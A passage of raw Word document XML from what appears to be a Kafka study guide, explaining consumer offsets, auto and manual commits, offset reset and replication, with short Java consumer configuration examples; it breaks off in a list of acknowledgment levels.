          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A consumer group is a group of consumers that collectively read messages from Kafka partitions. Each consumer in the group is responsible for consuming messages from a set of partitions. Kafka ensures that each partition is consumed by only one consumer in the group at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1F81E" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Offsets per Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each consumer group has its own set of offsets for each partition. These offsets are stored in an internal Kafka topic named __consumer_offsets, which keeps track of the latest offset each consumer group has committed for each partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F88EB6" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Offset Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka provides two main methods for managing offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587A0AE" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134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Automatic Offset Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Offsets are automatically committed after a specified interval. This is controlled by the enable.auto.commit configuration parameter. The consumer doesn't need to manually commit offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2BEE68" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134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anual Offset Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can commit offsets manually using commitSync() or commitAsync(). This provides more control over when an offset is saved, which can help in cases where you need to ensure that offsets are only committed after successful message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1365D24B" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Workflow of Tracking Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444137CD" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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ption</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer reads a message from a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150681ED" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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mmit Offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After reading the message, the consumer commits the offset, either automatically or manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B31B65" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Next Consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the consumer restarts or recovers, it reads the last committed offset from the __consumer_offsets topic and resumes consuming from that point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332EB14E" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Automatic Offset Commit Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154DF58"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hen automatic offset commit is enabled, Kafka automatically tracks and commits the consumer’s position. The consumer will commit offsets periodically (as specified by auto.commit.interval.ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008FCEC"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erties properties = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DBCE4B"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erties.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285BD95"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erties.put("group.id", "test-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC6C8A7"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erties.put("enable.auto.commit", "true");  // Auto-commit enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080CB278"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erties.put("auto.commit.interval.ms", "1000");  // Commit interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A276C8C" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057C3797"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D5195"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sumer.subscribe(Arrays.asList("order_topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF7DAC" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Manual Offset Commit Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E50055"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sumers can manually commit offsets, providing more control over when offsets are saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A9658"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176832A"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sumer.subscribe(Arrays.asList("order_topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92A9E3" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478C5C2E"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sumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(1000));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB92E12"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for (ConsumerRecord&lt;String, String&gt; record : records) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51294ED1"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 Process message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C17F85"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System.out.println(record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245D1C1"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8CBB0B" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F07E6B"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Manually commit the offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052EBE98"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sumer.commitSync();  // Synchronously commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D527A06" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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4. What Happens if the Consumer Crashes or Restarts?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102029D9" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Automatic Offset Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer crashes or restarts, it will resume from the last successfully committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF23270" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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anual Offset Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer uses manual offset commits, it will resume from the last manually committed offset after a crash or restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3285CCE7" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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5. Offset Reset Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52128811"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lastRenderedPageBreak/>
        <w:t>Kafka allows consumers to reset their offsets to different positions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFADF53" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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atest</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Start from the latest available message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52564340" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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earliest</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Start from the earliest available message (beginning of the log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525ECEC2" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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pecific offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Start from a specific offset in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2EC085"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e offset reset behavior is controlled by the auto.offset.reset configuration, which is typically set to latest or earliest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C7234" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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6. Example of Offset Reset in Kafka Consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5FE19"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erties properties = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0681CA52"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erties.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B58F9"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erties.put("group.id", "test-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1103D"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erties.put("auto.offset.reset", "earliest");  // Start from the earliest message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68CE73" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C4E6E6"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDAC637"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sumer.subscribe(Arrays.asList("order_topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF322D0" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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7. Offset Management Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B8911" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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mmit offsets only after successful message processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This ensures that messages are not lost if the consumer crashes before they are successfully processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215FC43" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Use manual commit for critical processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In cases where you need to ensure that processing is complete before committing, manual offset commit gives finer control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B5AD4" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Avoid committing offsets too frequently</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Committing too often can impact performance. Instead, commit offsets after a batch of messages is processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37582B3E" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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ey Takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7FCB28" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a unique identifier for messages in a Kafka partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA18B01" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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consumers track their consumption position by committing offsets in the Kafka topic __consumer_offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E9E86" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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sumers can commit offsets either automatically or manually based on the use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF44981" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Offsets help ensure that consumers can </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing from the correct position after failures or rebalances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4B6FF" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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By efficiently managing offsets, Kafka enables consumers to process messages reliably and fault-tolerantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085E662" w14:textId="0D84EB62" w:rsidR="00412451" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00412451">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B85F7EB">
          <v:rect id="_x0000_i3159" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2077AC" w14:textId="4DF54FA8" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="783" w:name="_Toc196308263"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Kafka ensure data reliability and fault tolerance</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="783"/>
    </w:p>
    <w:p w14:paraId="0E057F05" w14:textId="29FD9838" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00F6248E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data reliability</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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through several key mechanisms that help in maintaining message integrity, availability, and consistency, even in the case of failures. These mechanisms include data replication, partitioning, acknowledgment configurations, and fault-tolerant consumer group mechanisms. Below are the key components that enable Kafka to achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6AE33" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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1. Data Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B583AA" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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achieves fault tolerance by replicating data across multiple brokers. This ensures that even if one broker fails, the data is still available on other brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588DFE2" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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plication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka topics can be configured with a replication factor, which defines how many copies of the data will be maintained across different brokers. For example, if the replication factor is 3, Kafka will maintain 3 copies of each partition on 3 different brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01B3C0" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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eader and Follower Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each partition in a Kafka topic has one </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replica and multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replicas. The leader is the one that handles all reads and writes, while the followers replicate the data from the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F598DA3" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135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f a leader fails, one of the followers can be promoted to be the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B8B98" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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plication in Action</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the leader of a partition becomes unavailable, Kafka ensures that the system can continue functioning by promoting a follower replica to become the new leader, minimizing downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4716D8" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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2. Acknowledgment Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05442108" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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provides several acknowledgment levels for producers to ensure the durability and reliability of messages. Producers can configure how they want the broker to acknowledge the receipt of messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3EB1A" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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acks=0</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
